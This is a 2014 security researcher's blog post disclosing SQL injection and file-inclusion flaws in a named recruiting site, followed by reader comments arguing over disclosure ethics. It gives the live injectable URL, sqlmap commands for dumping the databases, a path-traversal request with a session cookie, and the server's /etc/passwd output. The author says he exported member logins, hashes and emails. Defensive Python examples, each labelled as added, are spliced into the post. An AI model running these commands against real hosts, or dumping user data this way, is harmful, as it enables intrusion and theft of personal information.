Friday, July 25, 2014

Jobvite Database Take-Over and Linux Users Information Disclosure

Hello, I'm Mohamed M. Fouad, an independent security researcher from Egypt. I have received acknowledgements from many firms, such as Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket, Splitwise and many more...
Hello Guys!
Today I will show you how I found Boolean-based SQL injection (SQLi) and local file inclusion (LFI) vulnerabilities in Jobvite. First, let me tell you about Jobvite. Jobvite is a social recruiting and applicant tracking platform created for companies with the highest expectations of candidate quality and recruiting technology. I reported these critical security vulnerabilities 3 months ago, but they haven't fixed anything yet, so I decided to write about this great finding; it was one of the best security vulnerabilities I have ever discovered.

Story:
While investigating vulnerabilities in oDesk (a famous freelancer jobs website), I found an iframe loaded from Jobvite. It was interesting to me, so I switched my pen test to the Jobvite website, and after many hours of hard work investigating I found a Boolean-based SQLi in the "cat" parameter of the URL below. As everyone knows, this kind of SQL injection asks the database true-or-false questions and determines the answer based on the application's response, which makes exploiting the SQL injection vulnerability more difficult, but not impossible. After trying a lot of these tricks I found that the "cat" parameter was vulnerable, so I opened sqlmap and executed the commands below. With the first command I got the databases available on the Jobvite website; with the second I got the information schema of the database; then I tried to get the tables, columns and data.
Vulnerable URL:
http://recruiting.jobvite.com/customers/?cat=-1 OR 17-7=10
Payload Commands:
Command 1: sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 --dbs
Command 2: sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -D <database_name> --tables
Command 3: sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -T <table_name> --columns
Command 4: sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -T <table_name> --dump
Jobvite Databases:
available databases [3]:
[*] information_schema
[*] recruiting
[*] test
After I got all the Jobvite databases, I started loading the tables and all their data, then exported it to Excel files. It was sensitive information about members and their created profiles: logins with hashed passwords, salts, emails, etc.
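To make the Boolean-based mechanism concrete, here is an added example (my own illustration, not Jobvite's code and not part of the original post) using an in-memory SQLite table with constructed rows. It shows why the page's payload "-1 OR 17-7=10" changes the result set when the parameter is concatenated into the query text, and why the same value is inert once it is validated as an integer and bound as a parameter. The table name, columns and row values are assumptions.

```python
# Added example (not Jobvite's code): a minimal model of a "cat" lookup,
# showing why a boolean-based payload works against string-built SQL and
# why it is inert against a validated, parameterised query.
import sqlite3

# Constructed sample rows; the table and values are assumptions.
CUSTOMERS = [
    (1, 10, "Acme Corp"),
    (2, 10, "Globex"),
    (3, 20, "Initech"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed customers table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER, cat INTEGER, name TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", CUSTOMERS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, cat: str) -> list:
    """The anti-pattern: the raw query-string value becomes part of the SQL text.

    With cat = "-1 OR 17-7=10" the statement becomes
    SELECT name FROM customers WHERE cat = -1 OR 17-7=10
    and the trailing condition decides the result, not the category.
    """
    sql = f"SELECT name FROM customers WHERE cat = {cat}"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn: sqlite3.Connection, cat: str) -> list:
    """Hardened form: strict type validation, then a bound parameter.

    The value can only ever be compared as an integer; it is never parsed
    as SQL, so "-1 OR 17-7=10" is simply not a valid category.
    """
    try:
        cat_id = int(cat)
    except ValueError:
        return []   # unknown category; the caller cannot steer the query
    sql = "SELECT name FROM customers WHERE cat = ?"
    return [row[0] for row in conn.execute(sql, (cat_id,))]


def response_differs(conn: sqlite3.Connection, a: str, b: str) -> bool:
    """What a blind boolean test observes: two payloads, two different pages.

    A true condition returns every row and a false one returns none; that
    difference alone is the oracle, with no error text or data echoed.
    """
    return vulnerable_lookup(conn, a) != vulnerable_lookup(conn, b)


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "-1 OR 17-7=10"))   # every row: the condition is true
    print(vulnerable_lookup(db, "-1 OR 17-7=11"))   # nothing: the condition is false
    print(response_differs(db, "-1 OR 17-7=10", "-1 OR 17-7=11"))  # True: the oracle
    print(safe_lookup(db, "-1 OR 17-7=10"))         # nothing: rejected by int()
    print(safe_lookup(db, "10"))                    # the two category-10 names
```

The point of the hardened version is not the parameter marker alone: validating the type first means a non-numeric "cat" never reaches the database, so there is no true/false difference left for a blind probe to observe.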

After this great finding I decided to keep looking for more critical vulnerabilities at Jobvite, and after more hours of hard work I found an LFI vulnerability that allowed me to view all of their existing Linux user accounts.

Vulnerable URL:

http://recruiting.jobvite.com/themes/jobvite/js/proxy.php?url=../../../../../../../../../../../etc/passwd
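The URL above works because the "url" value is joined onto a file path and opened without being confined to a directory. The following is an added example (written for this page, not Jobvite's proxy.php and not from the original post) of the two controls that close this class of bug: canonicalise-then-check containment when the value is a local file name, and a destination allow-list when the endpoint is really meant to fetch remote URLs, which the parameter name suggests. The base directory, the sample asset "widget.js" and the allow-listed host are assumptions made for illustration.

```python
# Added example, not Jobvite's proxy.php: how an endpoint that takes a file
# name or URL from the query string can confine what it opens. The base
# directory, sample asset and allow-listed host are assumptions.
import os
import tempfile
from urllib.parse import unquote, urlsplit


class PathRejected(ValueError):
    """Raised when a requested path would leave the allowed directory."""


def resolve_under(base_dir: str, requested: str) -> str:
    """Return the canonical path for `requested` only if it stays inside base_dir.

    Order matters: percent-decode first (the request on this page sends
    ..%2f), refuse empty values, NUL bytes and absolute paths, join onto the
    base, canonicalise with realpath (collapses ../ and follows symlinks),
    and only then compare. Looking for the literal text "../" before
    decoding would miss the encoded form entirely.
    """
    decoded = unquote(unquote(requested))        # twice, so %252f is seen as "/"
    if not decoded or "\x00" in decoded:
        raise PathRejected("empty path or NUL byte")
    if decoded.startswith(("/", "\\")):
        raise PathRejected("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                           # different drives on Windows
        inside = False
    if not inside or candidate == base:
        raise PathRejected("path escapes base directory")
    return candidate


def allowed_proxy_target(url: str, allowed_hosts: set) -> bool:
    """Allow-list check for a URL-fetching proxy.

    The vulnerable parameter is named "url", so the endpoint was presumably
    meant to fetch remote content (an assumption about intent). For that
    design the matching control is a destination allow-list: http(s) only,
    a known host, no credentials in the URL, and the value is never treated
    as a local path at all.
    """
    parts = urlsplit(url)
    return (parts.scheme in ("http", "https")
            and parts.hostname is not None
            and parts.hostname in allowed_hosts
            and parts.username is None)


def demo() -> dict:
    """Exercise resolve_under against constructed requests in a throwaway directory."""
    requests = [
        "widget.js",                      # legitimate asset
        "sub/../widget.js",               # normalises to the same asset
        "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",  # the page's request
        "..%252f..%252fetc%252fpasswd",   # double-encoded variant
        "/etc/passwd",                    # absolute path
        "",                               # missing value
    ]
    outcome = {}
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "widget.js"), "w") as fh:
            fh.write("// constructed sample asset\n")
        for req in requests:
            try:
                with open(resolve_under(base, req)) as fh:
                    outcome[req] = "served: " + fh.read().strip()
            except PathRejected as exc:
                outcome[req] = "rejected: " + str(exc)
            except OSError:
                outcome[req] = "not found"
    return outcome


if __name__ == "__main__":
    for req, result in demo().items():
        print(repr(req), "->", result)
    print(allowed_proxy_target("http://recruiting.jobvite.com/company/blog/",
                               {"recruiting.jobvite.com"}))                      # True
    print(allowed_proxy_target("file:///etc/passwd", {"recruiting.jobvite.com"}))  # False
```

Note that "sub/../widget.js" is accepted: the check is on where the canonical path ends up, not on whether the text contains "..", which is what makes it robust against the encoded and double-encoded forms while still serving legitimate assets.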



Request:

GET /themes/jobvite/js/proxy.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Cache-Control: no-cache
Referer: http://recruiting.jobvite.com/company/blog/
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0;)
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: recruiting.jobvite.com
Cookie: PHPSESSID=jptdpcj7hv67q2cvsh7gq0r8e5; AWSELB=F70F99F314754553144E10626D06E4B925C9BA361D8989148366459359D4C53E10A6006CB0477B40A9FD3FFFD8451EF600469DF4E4E57E1F8ECC5962D1C364EE83A01FC361
Accept-Encoding: gzip, deflate


Response:

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 01 Apr 2014 17:29:24 GMT
Server: Apache/2.2.15 (Red Hat)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Content-Encoding: 
Content-Length: 725
Content-Type: application/xml

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
bacula:x:133:133:Bacula Backup System:/var/spool/bacula:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ken:x:501:500::/home/ken:/bin/bash
margaret:x:502:500::/home/margaret:/bin/bash
patrick:x:503:500::/home/patrick:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
varun:x:504:504:Varun Aggarwal:/home/varun:/bin/bash
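On the detection side, a request like the one above leaves a recognisable trace in the web server's access log. The following is an added example (written for this page, not part of the original post or of Jobvite's tooling) that parses combined-format log lines, percent-decodes each query value a second time so double-encoded slashes are not missed, and flags traversal sequences and the "OR <expr>=<expr>" shape of the SQLi payload shown earlier. The log lines, client addresses and timestamps are constructed.

```python
# Added example (not from the post or Jobvite): replay access-log lines and
# flag traversal sequences and boolean tautologies in request parameters.
# The log lines, client addresses and timestamps below are constructed.
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Combined log format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." as a whole path component, e.g. "../" or "..\", checked after decoding.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# "<value> OR <expr>=<expr>" shape, e.g. the page's "-1 OR 17-7=10".
BOOL_RE = re.compile(r"(?i)\b(?:or|and)\b\s+[\w'\"().-]+\s*=\s*[\w'\"().-]+")

SAMPLE_LOG = [  # constructed lines modelled on the request shown in the post
    '203.0.113.5 - - [01/Apr/2014:17:29:24 +0000] "GET /themes/jobvite/js/proxy.php'
    '?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 725 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Apr/2014:17:31:02 +0000] "GET /customers/?cat=-1%20OR%2017-7%3D10 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Apr/2014:17:31:40 +0000] "GET /customers/?cat=12 HTTP/1.1" 200 3990 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Apr/2014:17:32:11 +0000] "GET /themes/jobvite/js/widget.js HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Apr/2014:17:33:55 +0000] "GET /themes/jobvite/js/proxy.php'
    '?url=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def scan_target(target: str) -> list:
    """Return rule hits for one request target such as /x.php?url=..%2fetc."""
    findings = []
    parts = urlsplit(target)
    # Decode the path twice so a double-encoded %252e%252e is also caught.
    if TRAVERSAL_RE.search(unquote(unquote(parts.path))):
        findings.append("traversal:path")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)        # parse_qsl decoded once; second pass for %25xx
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal:{name}")
        if BOOL_RE.search(value):
            findings.append(f"sqli:{name}")
    return findings


def scan_log(lines) -> list:
    """Return (client, target, findings) for each line that triggers a rule."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue    # unparsable line; a real pipeline would count these
        findings = scan_target(match.group("target"))
        if findings:
            hits.append((match.group("client"), match.group("target"), findings))
    return hits


if __name__ == "__main__":
    for client, target, findings in scan_log(SAMPLE_LOG):
        print(client, findings, target)
```

These are coarse triage indicators rather than proof of compromise: a legitimate value could contain "or x=y", and a 200 response to a traversal request (as in the response above) matters far more than a 404, so pair the findings with the status code and the handler's actual behaviour before escalating.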

I found other vulnerabilities here too, but the SQLi and LFI were the best :D. I reported these critical security vulnerabilities to Jobvite, and after a couple of days a guy called "Mahesh Thimmaiah", an application security consultant at Jobvite, replied to me with the following:



Here's the video demonstration URL:
Hope you find it interesting and HAVE FUN with the PoC video :)

CAUTION

THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Regards,

7 comments:

  1. Hello Mohamed,

    Your report is incorrect.

    Our application is completely secure. This vulnerability is on SilverStripe, our corporate content management system that hosts Jobvite marketing content. Our corporate site does not contain any application or customer data.

    Jobvite application and customer data are completely secure.

    Please remove this article at your earliest. Please let me know if you would like to discuss this further.

    Sincerely,

    -Adam Hyder

    1. Hello Adam,

      First, thanks for your reply, and kindly be informed that I'm an ethical security researcher. When I found these critical vulnerabilities I contacted Jobvite immediately and got a reply from "Mahesh", who is responsible for Jobvite security, so I sent him all the data he requested 4 months ago, again without response!! So it's a Jobvite problem, not mine, and Jobvite is responsible for their website even if this impact is because of another product Jobvite already uses. Jobvite didn't take responsibility for my report, and it was critical, and don't forget I reported this ethically and Jobvite ignored me. If you see here, it's a clear SQLi and I got data; whatever data is critical or not for you, for me it's data from the Jobvite website. So if you want to talk about that, contact me at my email "flash162011@gmail.com".

      Regards,

    2. @Mohamed

      It's not an ethical hacker's way to showcase the findings to the public...
      If the Jobvite team is not interested in your findings, leave it; it's their business and reputation.

    3. @Adam
      Still the vulnerability is there. Your whole DB can be copied... You should hire a pro programmer for coding...

  2. This is entirely incorrect Adam.

    SilverStripe by default (especially at the extremely outdated version you are using) ships as nothing more than a reasonably simple CMS built upon a framework which allows an author to create and edit relatively simple content pages consisting of HTML text and uploaded images.

    SilverStripe can be used as far more than this as it has been built ground up on a framework as mentioned. This allows developers to easily and speedily build upon the CMS or develop their own system. This of course means though that standard practice should apply when dealing with security - input must be escaped before being utilised, and at least some basic pen-testing should take place.

    In all cases one should try to work within their chosen framework, not AROUND it, as is painfully obvious by your having executable PHP within the themes directory (which is not normal at all). Of course SilverStripe can aid with escaping user data before it is passed through to the database layer, but it seems that even this is being ignored by your developers (as evident with the GET variables in the URL leading to injections).

    In any case, it is most certainly your custom code built within (or in this case around) SilverStripe that is causing the issue, and your statement here denying as such does not make it any less real - it simply amounts to poor PR & bullying tactics to make a problem go away (which it won't - only fixing it will do that). It is certainly unfair to blame another system (truth or not), as it is ultimately your company's choice and duty to evaluate it and ensure its security, along with the resulting product you construct from it.

    SilverStripe is open source (BSD licence), and thus will also accept commits back upstream to patch any security issues found within it (or at least deal with them internally if notified as such) - although version 2.4 is fast coming up on end of life for even security patches now, it is that out of date. http://www.silverstripe.org/silverstripe-2-4-end-of-life-announcement/

  3. Dear @Arun, I think it's not ethical of @Adam to disclose the technology he has used and throw it at another player, and as for @Mohamed, he is so ethical because he wants to protect people's info, so he gave JobVite too much time to fix the issue, but you didn't take action as per the email mentioned in the blog. So if JobVite doesn't care about this critical vulnerability, who will care? Thanks again @Mohamed, but kindly modify the blog to give a warning for the reader: "this is for learning purpose and for Ethical use".

    @Pyro Thanks for your fair reply; it's so logical and I respect that from you.

    Good Luck
    WIBF
